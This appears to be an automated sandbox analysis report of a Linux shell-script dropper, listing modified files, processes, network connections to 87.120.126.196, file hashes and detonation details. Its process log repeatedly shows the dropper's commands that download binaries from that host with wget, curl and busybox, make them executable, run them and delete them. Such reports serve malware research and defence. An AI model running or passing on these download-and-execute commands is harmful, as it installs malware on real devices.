| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/828-1-0xb66a6000-0xb66b7044-memory.dmp
memory/846-2-0xb6708000-0xb6719044-memory.dmp
memory/858-3-0xb673f000-0xb6750044-memory.dmp
memory/884-4-0xb6747000-0xb6758044-memory.dmp
memory/891-5-0xb673a000-0xb674b044-memory.dmp
memory/923-6-0xb673b000-0xb674c044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
debian9-mipsbe-20240611-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
